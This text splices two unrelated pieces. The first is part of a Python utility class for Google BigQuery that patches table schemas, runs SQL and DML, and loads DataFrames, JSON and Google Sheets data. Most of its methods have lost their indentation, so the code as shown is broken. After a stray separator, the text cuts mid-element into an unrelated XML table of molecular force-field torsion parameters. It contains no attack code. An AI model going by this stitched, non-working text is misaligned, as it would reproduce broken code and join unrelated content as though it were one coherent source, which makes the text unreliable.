Returns:
list of clustering fields is the table has cluster fields, None otherwise.
"""
table_ref = self.get_table_ref(dataset_id, table_id, project_id=project_id)
clustering_fields = self.client.get_table(table_ref).clustering_fields
return clustering_fields
def identify_new_fields(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
    """ Identify fields present in a schema file but absent from a BigQuery table.

    Parameters:
        table_id (string): BigQuery table ID.
        schema_path (string): Path to the schema file to compare to.
        dataset_id (string): BigQuery dataset ID.
        project_id (string): BigQuery project ID.

    Returns:
        List of SchemaField objects found in the file but not in the table.
    """
    # NOTE(review): the dataset/project defaults are evaluated once at import
    # time (standard Python default-argument semantics); this mirrors every
    # other method in this module, so it is kept as-is.
    current_schema = self.get_table_schema(
        table_id=table_id,
        dataset_id=dataset_id,
        project_id=project_id
    )
    # Set lookup makes the comparison O(n + m) instead of the previous
    # O(n * m) list-membership scan per field.
    existing_names = {schema_field.name for schema_field in current_schema}
    target_schema = read_table_schema_from_file(schema_path)
    return [
        schema_field for schema_field in target_schema
        if schema_field.name not in existing_names
    ]
def append_field(self, table_id, field, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Append fields to a BigQuery table.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
field (string): Schema field object.
"""
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
table = self.client.get_table(table_ref) # API request
original_schema = table.schema
new_schema = original_schema[:] # creates a copy of the schema
new_schema.append(field)
table.schema = new_schema
table = self.client.update_table(table, ["schema"]) # API request
assert len(table.schema) == len(original_schema) + 1 == len(new_schema)
return 0
def apply_patch(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Apply a patch to a BigQuery Table if required.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file to compare to.
Returns:
Lenght of new schema
"""
logging.info("Attempting patch")
logging.info("Checking for new fields...")
new_fields = self.identify_new_fields(
table_id=table_id,
schema_path=schema_path,
project_id=project_id,
dataset_id=dataset_id
)
if new_fields != []:
logging.info("New fields to be added:")
logging.info(new_fields)
for field in new_fields:
self.append_field(
field=field,
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
)
logging.info("Done!")
else:
logging.info("No field to be added")
logging.info("Checking for schema update...")
self.update_schema(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
return len(
self.get_table_schema(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
)
)
def update_schema(self, table_id, schema_path, dataset_id=bq_default_dataset(),project_id=bq_default_project()):
""" Perform a schema update. Used to update descriptions.
Parameters:
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file to compare to.
Raises:
BadRequest if the update fails.
"""
table_ref = self.get_table_ref(dataset_id, table_id,project_id = project_id)
table = self.client.get_table(table_ref) # API request
new_schema = read_table_schema_from_file(schema_path)
if table.schema == new_schema:
logging.info("No changes needed")
else:
assert len(table.schema) == len(new_schema)
table.schema = new_schema
try:
table = self.client.update_table(table, ["schema"]) # API request
return 0
except exceptions.BadRequest as error:
raise error
def update_table_description(
self,
table_id,
description,
project_id=bq_default_project(),
dataset_id=bq_default_dataset()
):
""" Performs a table update to fill in description for the table.
Parameters:
table_id (string): BigQuery table ID.
description (string): The descriptive text to describe the content of the table.
project_id (string): BigQuery project ID.
dataset_id (string): BigQuery dataset ID.
Raises:
BadRequest if the update fails.
"""
table_ref = self.get_table_ref(dataset_id=dataset_id, table_id=table_id, project_id=project_id)
table = self.client.get_table(table_ref) # API request
if table.description == description:
logging.info("No changes to table description required")
else:
try:
table.description = description
self.client.update_table(table, ["description"]) # API request
except exceptions.BadRequest as error:
raise error
def execute_sql(self, sql, project_id=bq_default_project(), dialect='standard'):
""" Executes a SQL query and loads it as a DataFrame.
Parameters:
sql (string): SQL Query.
project_id (string): BigQuery Project ID.
dialect (string): BigQuery dialect. Defaults to standard.
Returns:
Query result as a DataFrame.
"""
data = pd.read_gbq(
sql,
project_id=project_id,
credentials=self.credentials,
dialect=dialect
)
return data
    def execute_dml(self, sql=None, file=None, location='US', project=bq_default_project()):
        """ Execute a DML statement and log the job statistics.

        Parameters:
            sql (string): DML statement. Takes precedence over ``file`` when both are set.
            file (string): Path to a SQL file, read only when ``sql`` is falsy.
            location (string): BigQuery job location. Defaults to 'US'.
            project (string): BigQuery project ID. NOTE(review): not referenced in the
                body — the client's default project is used instead; confirm intent.

        Raises:
            Exception: Re-raises any error from query submission or execution after logging it.
        """
        job_config = bigquery.QueryJobConfig()
        try:
            sql = sql if sql else read_sql(file)
            job = self.client.query(sql, location=location, job_config=job_config)
            results = job.result()  # blocks until the job completes
            logging.info("%s - %s - %s rows effected (%s elapsed, %s B processed)",
                job.statement_type,
                job.state,
                job.num_dml_affected_rows,
                job.ended - job.started,
                job.total_bytes_processed
            )
        except Exception as e:
            logging.error(e)
            raise e
        return
def execute_file(self, file, project_id=bq_default_project(),
dialect='standard', *args, **kwargs):
""" Executes a SQL file and loads it as a DataFrame.
Parameters:
file (string): Path to SQL file.
project_id (string): BigQuery Project ID.
dialect (string): BigQuery dialect. Defaults to standard.
**kwargs can be passed if the SQL file contains arguments formatted with {}.
Forbidden kwargs:
partition_date
Returns:
Query result as a DataFrame.
"""
sql = read_sql(file, *args, **kwargs)
data = self.execute_sql(
sql=sql,
project_id=project_id,
dialect=dialect
)
return data
def load_dataframe(self, df, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads DataFrame to BigQuery table.
Parameters:
df (pd.DataFrame): Pandas DataFrame
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id,
schema_path=schema_path
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
data = df.rename(columns=lambda cname: cname.replace('.', '_'))
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.write_disposition = set_write_disposition(write_disposition)
job = self.client.load_table_from_dataframe(
data,
table_ref,
job_config=job_config
)
job.result()
def create_gs_table(self,
table_id,
dataset_id=bq_default_dataset(),
project_id=bq_default_project(),
schema_path='',
googlesheet_uri=None,
googlesheet_key=None,
sheet_name=None,
header=True):
""" Creates BigQuery Table with live connection to Google Sheets
Args:
table_id (str): BigQuery table ID
dataset_id (str): BigQuery dataset ID
project_id (str): BigQuery project ID
schema_path (str): Path to schema file, if not set then BQ will auto-detect
googlesheet_uri (str): Google Sheet URI
googlesheet_key (str): Google Sheet Key, an alternate option instead of URI
sheet_name (str): GS Sheet Name, defaults to first worksheet, index 0
header (bool): Defaults to True
"""
if googlesheet_uri is None:
if googlesheet_key is None:
raise BigQueryExecutorError("A googlesheet_uri or googlesheet_key must be provided")
else:
googlesheet_uri = f"https://docs.google.com/spreadsheets/d/{googlesheet_key}"
external_config = bigquery.ExternalConfig("GOOGLE_SHEETS")
external_config.source_uris = [googlesheet_uri]
if sheet_name:
external_config.options.range = (sheet_name)
if header:
external_config.options.skip_leading_rows = 1
if schema_path != '':
schema = read_table_schema_from_file(schema_path)
else:
schema = None
external_config.autodetect = True
gs_table = bigquery.Table(
self.get_table_ref(
project_id=project_id,
dataset_id=dataset_id,
table_id=table_id
),
schema=schema
)
gs_table.external_data_configuration=external_config
try:
self.client.delete_table(gs_table, not_found_ok=True)
self.client.create_table(gs_table)
logging.info(
f"Created table {project_id}:{dataset_id}.{table_id} with live connection to {googlesheet_uri}"
)
except exceptions.Conflict as error:
logging.error(error)
raise error
def load_google_sheet(self,
table_id,
dataset_id=bq_default_dataset(),
project_id=bq_default_project(),
schema_path='',
googlesheet_key=None,
googlesheet_uri=None,
sheet_name=None,
description=None,
header=True,
write_disposition='WRITE_TRUNCATE'):
""" Loads Google Sheets data into a normal BigQuery Table
Args:
table_id (str): BigQuery table ID
dataset_id (str): BigQuery dataset ID
project_id (str): BigQuery project ID
schema_path (str): Path to schema file, if not set then BQ will auto-detect
googlesheet_uri (str): Google Sheet URI
googlesheet_key (str): Google Sheet Key, an alternate option instead of URI
sheet_name (str): GS Sheet Name, defaults to first worksheet, index 0
description (str): The descriptive text to describe the content of the table
header (bool): Defaults to True
write_disposition (str): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY
"""
temp_table_id=f"temp_gs__{table_id}"
try:
self.create_gs_table(
table_id=temp_table_id,
dataset_id=dataset_id,
project_id=project_id,
schema_path=schema_path,
googlesheet_key=googlesheet_key,
googlesheet_uri=googlesheet_uri,
sheet_name=sheet_name,
header=header
)
self.create_table(
project_id=project_id,
dataset_id=dataset_id,
table_id=table_id,
schema_path=schema_path,
write_disposition=write_disposition,
description=description,
sql=f"SELECT * FROM `{project_id}.{dataset_id}.{temp_table_id}`"
)
except Exception as error:
logging.error(error)
raise error
finally:
if self.table_exists(dataset_id=dataset_id, table_id=temp_table_id):
self.delete_table(dataset_id=dataset_id, table_id=temp_table_id)
def load_json_file(self, file, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads JSON file to BigQuery table.
Parameters:
file (string): Path to JSON file.
project_id (string): BigQuery Project ID.
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
if self.table_exists(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
):
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.source_format = bigquery.SourceFormat.NEWLINE_DELIMITED_JSON
job_config.write_disposition = set_write_disposition(write_disposition)
with open(file, mode='rb') as data:
job = self.client.load_table_from_file(
file_obj=data,
destination=table_ref,
location='US',
job_config=job_config
)
job.result()
else:
raise Exception("Please initiate %s:%s.%s or pass the schema file",project_id ,dataset_id, table_id)
def load_json_data(self, json, table_id, dataset_id=bq_default_dataset(),project_id=bq_default_project(), schema_path='', write_disposition="WRITE_TRUNCATE"):
""" Loads JSON data to BigQuery table.
Parameters:
json (string): JSON data.
table_id (string): BigQuery table ID.
dataset_id (string): BigQuery dataset ID.
project_id (string): BigQuery project ID.
schema_path (string): Path to schema file.
write_disposition (string): Write disposition. Can be one of WRITE_TRUNCATE, WRITE_APPEND or WRITE_EMPTY.
"""
if schema_path != '':
self.initiate_table(
table_id=table_id,
schema_path=schema_path,
dataset_id=dataset_id,
project_id=project_id
)
schema = read_table_schema_from_file(schema_path)
else:
schema = None
if self.table_exists(
table_id=table_id,
dataset_id=dataset_id,
project_id=project_id
):
table_ref = self.get_table_ref(dataset_id, table_id,project_id=project_id)
job_config = bigquery.LoadJobConfig(schema=schema)
job_config.write_disposition = set_write_disposition(write_disposition)
job = self.client.load_table_from_json(
json_rows=json,
destination=table_ref,
location='US',
job_config=job_config
)
job.result()
| |
k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C135" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C224" k1="-2.28028" k2="1.48532" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C283" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="C293" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="C235" k1="10.48092" k2="-0.39748" k3="2.07108" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="C235" k1="-3.64008" k2="-0.23012" k3="0.06276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224" type4="N238" k1="7.97052" k2="-1.1506" k3="1.65268" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C224I" type4="N238" k1="15.71092" k2="-1.23428" k3="-0.43932" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="C271" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C283" type4="N238" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="C235" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C137" type3="C293" type4="N287" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="C235" k1="-8.09604" k2="6.52704" k3="-0.1046" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C224S" type4="N238" k1="-6.98728" k2="2.46856" k3="-3.59824" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="C271" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C283" type4="N238" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="C235" k1="-2.974824" k2="2.234256" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="C293" type4="N287" k1="6.263448" k2="0.527184" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C158" type3="O154" type4="H155" k1="0.43932" k2="-2.53132" k3="0.85772" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="N238" k1="-0.58576" k2="-0.71128" k3="-0.54392" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="N239" k1="-0.54392" k2="-0.66944" k3="-0.50208" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C235" type4="O236" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C267" type4="O268" k1="2.092" k2="1.142232" k3="0.9414" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="C267" type4="O269" k1="0" k2="1.142232" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="N238" type4="C235" k1="-0.79496" k2="-0.35564" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C224A" type3="N238" type4="H241" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C223" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224A" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224S" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224K" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="C224Y" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N238" type4="H241" k1="0" k2="10.2508" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N239" type4="C245" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C235" type3="N239" type4="C246" k1="4.8116" k2="12.738188" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="C271" type4="O272" k1="0" k2="1.71544" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="N238" type4="C235" k1="-1.426744" k2="0.27196" k3="0.707096" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C283" type3="N238" type4="H241" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="N238" k1="3.721668" k2="0.876548" k3="-0.23012" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="N239" k1="3.721668" k2="0.876548" k3="-0.23012" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="C235" type4="O236" k1="0" k2="0" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C135" type2="C293" type3="N287" type4="H290" k1="0" k2="0" k3="0.725924" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C224K" k1="-5.23" k2="-1.00416" k3="0.79496" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C267" type2="C136" type3="C136" type4="C224" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C283" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C292" k1="-5.23" k2="-1.00416" k3="0.79496" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="C293" k1="2.7196" k2="-0.4184" k3="0.4184" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C267" type2="C136" type3="C136" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="C235" k1="-3.38904" k2="0.50208" k3="0.16736" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="C235" k1="-4.184" k2="-0.4184" k3="0" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224" type4="N238" k1="4.45596" k2="-0.77404" k3="3.30536" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C224K" type4="N238" k1="0.1046" k2="-0.27196" k3="1.82004" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C235" type4="N237" k1="5.949648" k2="-0.755212" k3="-0.6799" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C235" type4="O236" k1="0.849352" k2="2.727968" k3="0.290788" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C245" type4="H140" k1="0" k2="0" k3="0.6276" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C245" type4="N239" k1="1.76774" k2="-2.012504" k3="1.491596" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
<Proper type1="C136" type2="C136" type3="C246" type4="C235" k1="1.10876" k2="0.71128" k3="0.25104" k4="0.0" periodicity1="1" periodicity2="2" periodicity3="3" periodicity4="4" phase1="0.00" phase2="3.141592653589793" phase3="0.00" phase4="3.141592653589793"/>
